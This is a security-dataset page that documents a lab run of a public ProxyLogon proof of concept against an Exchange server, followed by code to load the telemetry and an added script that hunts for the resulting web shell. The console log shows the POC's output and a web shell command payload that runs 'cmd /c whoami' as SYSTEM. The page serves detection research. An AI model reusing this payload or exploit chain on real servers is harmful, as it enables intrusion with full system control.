Exchange ProxyLogon SSRF RCE Vuln POC

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2021/03/14
Modification Date: 2021/03/14
Tactics: TA0003 (Persistence), TA0002 (Execution)
Techniques: T1505.003 (Server Software Component: Web Shell)
Tags: None

Dataset Description

This dataset captures the execution of a public proof-of-concept (POC) for the Exchange Server ProxyLogon chain. The POC abuses CVE-2021-26855, a pre-authentication server-side request forgery (SSRF) in the Exchange frontend, to reach the backend as the built-in Administrator, then uses that access to write a web shell (ohyeah.aspx) into the OWA auth directory through the OAB virtual directory reset (CVE-2021-27065) and runs commands through the shell as NT AUTHORITY\SYSTEM. The POC was run from the Exchange host itself (target localhost) against the mailbox wardog@azsentinel.local, so the SSRF traffic is loopback rather than remote.

Simulation Metadata

Tools

type: Manual
Name: cmd
Module: cmd

Adversary View

C:\Users\wardog.MXS01\Documents>
C:\Users\wardog.MXS01\Documents>python public-poc.py localhost wardog@azsentinel.local
Attacking target localhost
=============================
Got DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog
Got SID: S-1-5-21-594047938-393122191-2580508586-500
Got session id: e243cd06-1093-40d4-829c-63f3b9caea9b
Got canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.
Got OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4
Ready!

Testing command:
===============
POST  shell:https://localhost/owa/auth/ohyeah.aspx
code":"Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").StdOut.ReadAll());


[*] Waiting for ohyeah.aspx to be available..
[*] Waiting for ohyeah.aspx to be available..

Results:
========
nt authority\system


C:\Users\wardog.MXS01\Documents>

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Zip archive in the OTRF Security-Datasets repository; it contains a single JSON-lines file
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail here on a bad URL or network error instead of handing an HTML error page to ZipFile
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the first (and only) member into the working directory; its path is used to load the events below
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The dataset is JSON lines (one event object per line), so lines=True is required;
# pd.read_json is the public API (pandas.io.json is an internal module)
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

# Count events per source log channel (Sysmon, Security, PowerShell, ...) to see what telemetry the dataset holds
df.groupby(['Channel']).size().sort_values(ascending=False)
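After the channel breakdown, the next thing to look for in this dataset are the two artifacts the adversary view records: the web shell written into OWA's auth directory and the cmd.exe spawned from the IIS worker process as NT AUTHORITY\SYSTEM. The following is an added example, not code from the original page or from the OTRF project: a standard-library-only hunt over JSON-lines events in the dataset's Sysmon field layout (Channel, EventID, Image, ParentImage, CommandLine, TargetFilename). The embedded events are constructed samples, and the Exchange drop-path pattern and the w3wp.exe-to-cmd.exe parent/child relation are assumptions about what this POC leaves behind, not values copied from the dataset.

```python
# Added example (not from the original page or the OTRF project): hunt Security-Datasets
# style JSON-lines events for the two ProxyLogon artifacts the adversary view produces:
# the web shell dropped under /owa/auth/ and the cmd.exe the shell spawns out of the IIS
# worker process (w3wp.exe). Field names follow the dataset's Sysmon events; the sample
# events below are CONSTRUCTED for offline testing, not rows from the real dataset.
import json
import ntpath
import re

# Assumption: web shells land under Exchange's frontend virtual directories, where a
# new .aspx file outside of setup/update windows is suspicious.
WEBSHELL_PATH_RE = re.compile(
    r"\\Exchange Server\\V15\\(FrontEnd\\HttpProxy|ClientAccess)\\.*\.aspx$",
    re.IGNORECASE,
)
# Child processes a web shell typically launches from the IIS worker process.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

SAMPLE_JSONL = "\n".join(json.dumps(e) for e in [
    # constructed: web shell written into the OWA auth directory (Sysmon EID 11, FileCreate)
    {"@timestamp": "2021-03-14T19:02:11Z", "Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ohyeah.aspx"},
    # constructed: the shell's "cmd /c whoami" spawned by the IIS worker (Sysmon EID 1, ProcessCreate)
    {"@timestamp": "2021-03-14T19:02:40Z", "Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "User": "NT AUTHORITY\\SYSTEM"},
    # constructed benign noise: an Exchange log file, an explorer-spawned cmd, a non-Sysmon event
    {"@timestamp": "2021-03-14T19:03:00Z", "Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\Program Files\Microsoft\Exchange Server\V15\Logging\HttpProxy\Owa\HttpProxy_2021031419-1.LOG"},
    {"@timestamp": "2021-03-14T19:03:05Z", "Hostname": "MXS01.azsentinel.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "MXS01\\wardog"},
    {"@timestamp": "2021-03-14T19:03:09Z", "Hostname": "MXS01.azsentinel.local",
     "Channel": "Security", "EventID": 4688, "NewProcessName": r"C:\Windows\System32\whoami.exe"},
])


def load_events(jsonl_text):
    """Parse JSON-lines text (the dataset's on-disk format) into a list of event dicts."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def _sysmon(events, event_id):
    """Filter to Sysmon events of one ID; other channels carry different field names."""
    return [e for e in events
            if e.get("Channel") == "Microsoft-Windows-Sysmon/Operational"
            and e.get("EventID") == event_id]


def find_webshell_writes(events):
    """Sysmon EID 11: new .aspx files under Exchange's frontend virtual directories."""
    return [e for e in _sysmon(events, 11)
            if WEBSHELL_PATH_RE.search(e.get("TargetFilename", ""))]


def find_w3wp_spawned_shells(events):
    """Sysmon EID 1: shells/interpreters whose parent is the IIS worker process."""
    return [e for e in _sysmon(events, 1)
            if ntpath.basename(e.get("ParentImage", "")).lower() == "w3wp.exe"
            and ntpath.basename(e.get("Image", "")).lower() in SHELL_CHILDREN]


def hunt(events):
    """Run both checks; return (dropped shell file names, child command lines) for triage."""
    writes = [ntpath.basename(e["TargetFilename"]) for e in find_webshell_writes(events)]
    spawns = [e.get("CommandLine", "") for e in find_w3wp_spawned_shells(events)]
    return writes, spawns


if __name__ == "__main__":
    # Against the real dataset: hunt(df.to_dict("records")) or hunt(load_events(open(datasetJSONPath).read()))
    print(hunt(load_events(SAMPLE_JSONL)))
```

To run this against the real dataset, pass `df.to_dict("records")` (or `load_events` over the extracted file) instead of the sample. The file-write check is the noisier of the two on a production server, since Exchange setup and cumulative updates also drop .aspx files under those directories; scope it to times outside maintenance windows, or join it with the w3wp.exe parent/child check, before turning it into an alert.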